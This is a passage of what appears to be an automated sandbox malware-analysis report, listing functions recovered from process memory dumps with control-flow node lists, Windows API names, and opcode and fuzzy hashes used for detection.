                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3064756180.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9b8a0000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ResumeThread
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                                                    • Opcode ID: 5846616992e05bb2f062cd015ce8d56601ba442f5cb012b67dbdd7f760c86065
                                                                                                                                                                    • Instruction ID: c6c1cfd22f0fa43a73d2a3054267c2acf4ec0918ba051ffd35274041c1ea2f5e
                                                                                                                                                                    • Opcode Fuzzy Hash: 5846616992e05bb2f062cd015ce8d56601ba442f5cb012b67dbdd7f760c86065
                                                                                                                                                                    • Instruction Fuzzy Hash: 63413970E0860C8FDB58EFA8D895AEDBBF0FB59310F10416AD40DE7252DA75A946CB40
                                                                                                                                                                    Function 00007FFD9B8AEC91 Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1376 7ffd9b8aec91-7ffd9b8aecad 1379 7ffd9b8aecaf 1376->1379 1380 7ffd9b8aecb0-7ffd9b8aed83 GetSystemInfo 1376->1380 1379->1380 1384 7ffd9b8aed85 1380->1384 1385 7ffd9b8aed8b-7ffd9b8aedbb 1380->1385 1384->1385
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3064756180.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9b8a0000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoSystem
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 31276548-0
                                                                                                                                                                    • Opcode ID: c6b79f5963bc47b9f446560d909979aad70c3d4d96693d4a433fe1edcfa42bbd
                                                                                                                                                                    • Instruction ID: 5fe6287d2e9554bf0255824711157d39954a19eae1a0a4692b80c5a9a1b78c48
                                                                                                                                                                    • Opcode Fuzzy Hash: c6b79f5963bc47b9f446560d909979aad70c3d4d96693d4a433fe1edcfa42bbd
                                                                                                                                                                    • Instruction Fuzzy Hash: 1041AE7090C68C8FDB99DFA8D859BE9BBF0EF5A310F1441ABD04DD72A2CA345946CB10
                                                                                                                                                                    Function 00007FFD9BE300C5 Relevance: 1.6, Strings: 1, Instructions: 377COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1388 7ffd9be300c5-7ffd9be300d9 1390 7ffd9be3011e 1388->1390 1391 7ffd9be300db-7ffd9be300fe 1388->1391 1392 7ffd9be30121-7ffd9be30136 1390->1392 1396 7ffd9be30100-7ffd9be30106 1391->1396 1397 7ffd9be30113-7ffd9be30116 1391->1397 1399 7ffd9be30137-7ffd9be30149 1392->1399 1401 7ffd9be3011a-7ffd9be3011d 1396->1401 1402 7ffd9be30108-7ffd9be3010e 1396->1402 1397->1401 1404 7ffd9be3018e-7ffd9be3019a 1399->1404 1405 7ffd9be3014b-7ffd9be30166 1399->1405 1401->1390 1402->1392 1407 7ffd9be30110 1402->1407 1404->1399 1408 7ffd9be3019c-7ffd9be30378 1404->1408 1405->1404 1407->1397 1415 7ffd9be303d5-7ffd9be303d9 1408->1415 1419 7ffd9be3038d 1415->1419 1420 7ffd9be30398-7ffd9be303db 1419->1420 1425 7ffd9be303c1-7ffd9be303e6 1420->1425 1426 7ffd9be303e8-7ffd9be303ea 1420->1426 1428 7ffd9be303cc 1426->1428 1429 7ffd9be303ec-7ffd9be303f1 1428->1429 1434 7ffd9be303ce-7ffd9be303d4 1429->1434 1434->1415
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3093822961.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9be30000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: ^
                                                                                                                                                                    • API String ID: 0-1590793086
                                                                                                                                                                    • Opcode ID: b1b6d7a99e1010a39de2a8e7e4d61e7e5ba7587567e9ce25ad8dd0652c21543f
                                                                                                                                                                    • Instruction ID: 7e2a709bfc6491c9914481be51967124a5398d8fc15409d8ad86d480c870f0f3
                                                                                                                                                                    • Opcode Fuzzy Hash: b1b6d7a99e1010a39de2a8e7e4d61e7e5ba7587567e9ce25ad8dd0652c21543f
                                                                                                                                                                    • Instruction Fuzzy Hash: 7441F553F0E06B86F239B6EC38716FC9744DF40BA6B090277D05D860E79C4A7E4252D6
                                                                                                                                                                    Function 00007FFD9BE397A6 Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3093822961.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9be30000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: H
                                                                                                                                                                    • API String ID: 0-2852464175
                                                                                                                                                                    • Opcode ID: b2133543a0b565c0b33ce9ec245d041a35adfe5202190892e5049e5ddeaf62ac
                                                                                                                                                                    • Instruction ID: 1eafaf2a500d054290ce31b980c7e2e12f71aeafea3801409e4bf6fe22b59e05
                                                                                                                                                                    • Opcode Fuzzy Hash: b2133543a0b565c0b33ce9ec245d041a35adfe5202190892e5049e5ddeaf62ac
                                                                                                                                                                    • Instruction Fuzzy Hash: 44813B31B0E64A4FE7789B68947957977E8EF85310F15057ED08FC31A2DF2AB9028741
                                                                                                                                                                    Function 00007FFD9B8AF0F5 Relevance: 1.4, APIs: 1, Instructions: 195memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3064756180.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9b8a0000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                    • Opcode ID: 655762fddd58db17d4abc150bae984e7cfe9a0a27339c96c1219034da96001ce
                                                                                                                                                                    • Instruction ID: 2123562f71307801efeb0ed25ed491f699c60835bede73b3c859f3c817d6aac4
                                                                                                                                                                    • Opcode Fuzzy Hash: 655762fddd58db17d4abc150bae984e7cfe9a0a27339c96c1219034da96001ce
                                                                                                                                                                    • Instruction Fuzzy Hash: 17513970908A5C8FDF98DF58D895BE9BBF0FB69310F1042AAD04DE3251DB70A981CB81
                                                                                                                                                                    Function 00007FFD9BA755E8 Relevance: 1.4, Strings: 1, Instructions: 162COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3072198419.00007FFD9BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA70000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9ba70000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                                                    • Opcode ID: 387d87be90a993154dc603db84308290d33aae84f1a2b968fdf3ed99947f1abc
                                                                                                                                                                    • Instruction ID: 234a38190814879d534320eb941ea2c500d548b061b8e150039754a7cf09ed80
                                                                                                                                                                    • Opcode Fuzzy Hash: 387d87be90a993154dc603db84308290d33aae84f1a2b968fdf3ed99947f1abc
                                                                                                                                                                    • Instruction Fuzzy Hash: 6C518F71E0D64E8FDB59DB98C8A55FCBBB1FF54304F1540BAC01AE7296DA742A02CB50
                                                                                                                                                                    Function 00007FFD9BE32C58 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3093822961.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9be30000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                                                    • Opcode ID: 0d9020612630371d80d751efadf950e8cb18d529579e6772f81aaf0d43a781d0
                                                                                                                                                                    • Instruction ID: 7b947d9b606cc97a2e6547b0914283157caf3f9dbc1d679bce509d72a207edac
                                                                                                                                                                    • Opcode Fuzzy Hash: 0d9020612630371d80d751efadf950e8cb18d529579e6772f81aaf0d43a781d0
                                                                                                                                                                    • Instruction Fuzzy Hash: 37518971E0960E8FDB59DFD8C4605FDB7B1EF48340F1540BAC05AE72A6DA396A01CB10
                                                                                                                                                                    Function 00007FFD9BE3A748 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3093822961.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9be30000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                                                    • Opcode ID: fd12c0796b09095d62b718435cedee8b2cb1032b7a0bb62eccc90e17a340e1df
                                                                                                                                                                    • Instruction ID: ee449b0d19c21009ddbbc20dc85ee7c2b8b87e8a2177408cd2f0c289229e4ea7
                                                                                                                                                                    • Opcode Fuzzy Hash: fd12c0796b09095d62b718435cedee8b2cb1032b7a0bb62eccc90e17a340e1df
                                                                                                                                                                    • Instruction Fuzzy Hash: D4518F31E0954E8FDB58DBD8C4A55FDB7B5FF48300F1141BAC01AE72A6DA362A82CB40
                                                                                                                                                                    Function 00007FFD9BA7E178 Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3072198419.00007FFD9BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA70000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9ba70000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                                                    • Opcode ID: 709dc781380415728b60777583a7d1c483a76ff62ad933777609d2c303a9f6d9
                                                                                                                                                                    • Instruction ID: 925fd53d197c96eee6717f5436bc88ebb8afaae73475e3ce5f0dbccad8c0e615
                                                                                                                                                                    • Opcode Fuzzy Hash: 709dc781380415728b60777583a7d1c483a76ff62ad933777609d2c303a9f6d9
                                                                                                                                                                    • Instruction Fuzzy Hash: 5D518F71E0D64E9FDB59DB98C4A15BDB7B1FF58304F1140BED01AE72A2DA782A01CB41
                                                                                                                                                                    Function 00007FFD9BA73560 Relevance: .7, Instructions: 692COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3072198419.00007FFD9BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA70000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9ba70000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 412188b9698f36916d0ade3a236bfcfc7949287fa02612f0c3da0f0ce73b4333
                                                                                                                                                                    • Instruction ID: e0e58dd55df587375745b849704ad25fd1c36f701c7141cc4aebf3c0d7a353a6
                                                                                                                                                                    • Opcode Fuzzy Hash: 412188b9698f36916d0ade3a236bfcfc7949287fa02612f0c3da0f0ce73b4333
                                                                                                                                                                    • Instruction Fuzzy Hash: F332B730B1DA1D8FDBA8DB48C8A5A7977E1FF54314F1241B9D00DC72A2DA75AE42CB81
                                                                                                                                                                    Function 00007FFD9BE33F11 Relevance: .4, Instructions: 410COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3093822961.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9be30000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 9f6fcc2fbb03bcd11c4728f4e0034d6fc590b141a2905a847f4fcd1d1889f481
                                                                                                                                                                    • Instruction ID: 02b8caa6043733461e37f45fc573d60aca414db0299cc9c60c72fa29d4b705ca
                                                                                                                                                                    • Opcode Fuzzy Hash: 9f6fcc2fbb03bcd11c4728f4e0034d6fc590b141a2905a847f4fcd1d1889f481
                                                                                                                                                                    • Instruction Fuzzy Hash: F7E1F330B0EA0A8FDB79DB68D4A157577F4FF54300B11457EC48FC36A2DA2ABA418B41
                                                                                                                                                                    Function 00007FFD9BA7E3EF Relevance: .4, Instructions: 403COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3072198419.00007FFD9BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA70000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9ba70000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: e3db4d4253d1f3a0b3675fbeec696d704820803764588cb9416715419929793c
                                                                                                                                                                    • Instruction ID: f50983c0bbbcd6f735f0d8e91db608bd84d51eea55f552f41a04bd443ca4d6ac
                                                                                                                                                                    • Opcode Fuzzy Hash: e3db4d4253d1f3a0b3675fbeec696d704820803764588cb9416715419929793c
                                                                                                                                                                    • Instruction Fuzzy Hash: D8E1E030A1D5498FEB6CCF58C0E06B537A5FF45304B5542BDD84ECB29ADA78E982CB81
                                                                                                                                                                    Function 00007FFD9BA768C7 Relevance: .4, Instructions: 383COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3072198419.00007FFD9BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA70000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9ba70000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 2cfb362644931bde8bb0eaf5313de3a4a197ac218015cf5d84efe128566c41eb
                                                                                                                                                                    • Instruction ID: c9b829774b64cc6d4859924920ce8ac608325cd79d3a05f12d949a913fe06821
                                                                                                                                                                    • Opcode Fuzzy Hash: 2cfb362644931bde8bb0eaf5313de3a4a197ac218015cf5d84efe128566c41eb
                                                                                                                                                                    • Instruction Fuzzy Hash: 98D10530E0E74A8FD379DB68D4A46757BE0FF45308B1545BEC04AC36A2DA69B942C741
                                                                                                                                                                    Function 00007FFD9BE32ECF Relevance: .4, Instructions: 377COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3093822961.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9be30000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 080094be45697116365ff6d7a7dfb461b863b5dedc07db78787651400e55bd99
                                                                                                                                                                    • Instruction ID: 07be8c24c5c648180e7bf29871b5c3c8c0e88f5ec527d3d5dccfa4a0af7fd228
                                                                                                                                                                    • Opcode Fuzzy Hash: 080094be45697116365ff6d7a7dfb461b863b5dedc07db78787651400e55bd99
                                                                                                                                                                    • Instruction Fuzzy Hash: E8D1E33061954A8FEB69CF48D4E09B137A5FF45300B5142BDC84BCB69BDA39F981CB80
                                                                                                                                                                    Function 00007FFD9BE3A9BF Relevance: .4, Instructions: 364COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3093822961.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9be30000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 81e7c1a553147cb32ced91787b436876adb5269bcff2da400372a94b33c4b90b
                                                                                                                                                                    • Instruction ID: e7fd765efd187632619c1f0bb435507c63d4df651b7c471748f4fb05b3354b40
                                                                                                                                                                    • Opcode Fuzzy Hash: 81e7c1a553147cb32ced91787b436876adb5269bcff2da400372a94b33c4b90b
                                                                                                                                                                    • Instruction Fuzzy Hash: FFD1B0306195598FEB68CF48C0E05B437A5FF48305B6552BDC84A8B69BDA3AF9C1CB80
                                                                                                                                                                    Function 00007FFD9BE3A9DF Relevance: .3, Instructions: 335COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3093822961.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9be30000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 13b37116443e82c72fde1ec5735ea8e3fb46544dfb4601dc07c46f9c745ccdb3
                                                                                                                                                                    • Instruction ID: 9ae67c1044e9378d09769e68c8be47bb8a4e10335ebd5eb34447e817e7e1b131
                                                                                                                                                                    • Opcode Fuzzy Hash: 13b37116443e82c72fde1ec5735ea8e3fb46544dfb4601dc07c46f9c745ccdb3
                                                                                                                                                                    • Instruction Fuzzy Hash: 13C1033061954A8FEB2DCF48C0E05B537A5FF44305B6555BDC84B8B69BDA3AF981CB80
                                                                                                                                                                    Function 00007FFD9BA7587F Relevance: .3, Instructions: 335COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3072198419.00007FFD9BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA70000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9ba70000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: db132bee2e3dd090f14863b846744bbab5cf62c14e70715a0ae0dbf9a7ea4a13
                                                                                                                                                                    • Instruction ID: 43eb163d7d52aaea214bb356c0055ff97b7d86b47edc95adfcc4e624d3099ed4
                                                                                                                                                                    • Opcode Fuzzy Hash: db132bee2e3dd090f14863b846744bbab5cf62c14e70715a0ae0dbf9a7ea4a13
                                                                                                                                                                    • Instruction Fuzzy Hash: 61C1D130A1E54A8BEB2CCF48C8E45B137A1FF85304B5545BDD85B8B69BDA78F942CB40
                                                                                                                                                                    Function 00007FFD9BE32EEF Relevance: .3, Instructions: 334COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3093822961.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9be30000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 46994be433c7fafbee743221ffb95d5963c8669e5d7d15c8452aff8c2831e021
                                                                                                                                                                    • Instruction ID: 5ae37097e55ba6ffbe314d35ef2a3abd32542cf0a602878d4c2849ff21cae634
                                                                                                                                                                    • Opcode Fuzzy Hash: 46994be433c7fafbee743221ffb95d5963c8669e5d7d15c8452aff8c2831e021
                                                                                                                                                                    • Instruction Fuzzy Hash: 3DC1F430A1954A8BEB2ECF48D4E09B137A5FF45300B5146BDD85B8B69BDB39F941CB80
                                                                                                                                                                    Function 00007FFD9BA7E40F Relevance: .3, Instructions: 330COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3072198419.00007FFD9BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA70000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9ba70000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 2b6ecc6e64f5ca6ca8776a843b487c7af9f2df1081757ecedf460a3fb2c45e0b
                                                                                                                                                                    • Instruction ID: 2f872e97125eaecf76919b9dcb45ec46252cafc5275b5cd7ac6a72363417d843
                                                                                                                                                                    • Opcode Fuzzy Hash: 2b6ecc6e64f5ca6ca8776a843b487c7af9f2df1081757ecedf460a3fb2c45e0b
                                                                                                                                                                    • Instruction Fuzzy Hash: F1C1E430A1D54A8BEB2DCF48C0E05B537A5FF45308B6545BDD84B8B6ABDA78F542CB40
                                                                                                                                                                    Function 00007FFD9BE37C37 Relevance: .3, Instructions: 323COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3093822961.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9be30000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 20917c0faacfcd57c2baa26f129e187e3641b9c493042aaa7418bbb845d09dee
                                                                                                                                                                    • Instruction ID: 92b9ef3d15c410cf8fdfd1b1dc9145f8fae37c1338ed12e3e1cf524d3734e435
                                                                                                                                                                    • Opcode Fuzzy Hash: 20917c0faacfcd57c2baa26f129e187e3641b9c493042aaa7418bbb845d09dee
                                                                                                                                                                    • Instruction Fuzzy Hash: 6C31EB52F0F1AB86F37862EA24718F877449F15620F1A017BC04D860E6FC0E6E45539B
                                                                                                                                                                    Function 00007FFD9BA75112 Relevance: .3, Instructions: 320COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3072198419.00007FFD9BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA70000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9ba70000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 736268ce46f22b69854123841c7cc126cb71b64988ce1b9286b5fc892733110a
                                                                                                                                                                    • Instruction ID: 8faeada915042f283aaa4bec996f825f9ff6f071176aaea6b7a4806e78e79c73
                                                                                                                                                                    • Opcode Fuzzy Hash: 736268ce46f22b69854123841c7cc126cb71b64988ce1b9286b5fc892733110a
                                                                                                                                                                    • Instruction Fuzzy Hash: C4B1E030B0EA4A8FE358DF58C4B06B4B7A1FF54304F5541B9C04EC7AA6CBA8B951CB80
                                                                                                                                                                    Function 00007FFD9BE3A272 Relevance: .3, Instructions: 319COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3093822961.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9be30000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 9a0e570a5022a243c5fb9e23cf31f017ef0c0d3f334b5aee6cf4762da723cf96
                                                                                                                                                                    • Instruction ID: b88d5a549e0934587b199c6d596d484c7be3de51b350ff244e0674ae135d014d
                                                                                                                                                                    • Opcode Fuzzy Hash: 9a0e570a5022a243c5fb9e23cf31f017ef0c0d3f334b5aee6cf4762da723cf96
                                                                                                                                                                    • Instruction Fuzzy Hash: F0B10430B0994E9FE359DF68C0A06B8B7A5FF44300F555179D04EC7A96DB3AB991CB80
                                                                                                                                                                    Function 00007FFD9BA7DCA2 Relevance: .3, Instructions: 318COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3072198419.00007FFD9BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA70000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9ba70000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 9dd13562c705d8af0e6f7ec793e6b4654126620128cd870e2cc28271bac2c9f9
                                                                                                                                                                    • Instruction ID: db9eae2718dce0db0a7db0b50b888b2ce08aabf2ca3732e1660989ed63e2e264
                                                                                                                                                                    • Opcode Fuzzy Hash: 9dd13562c705d8af0e6f7ec793e6b4654126620128cd870e2cc28271bac2c9f9
                                                                                                                                                                    • Instruction Fuzzy Hash: FDB1E370B0D94A8FE759DF68C0A06B4B7A0FF58304F554179D08EC7AA6DB78B951CB80
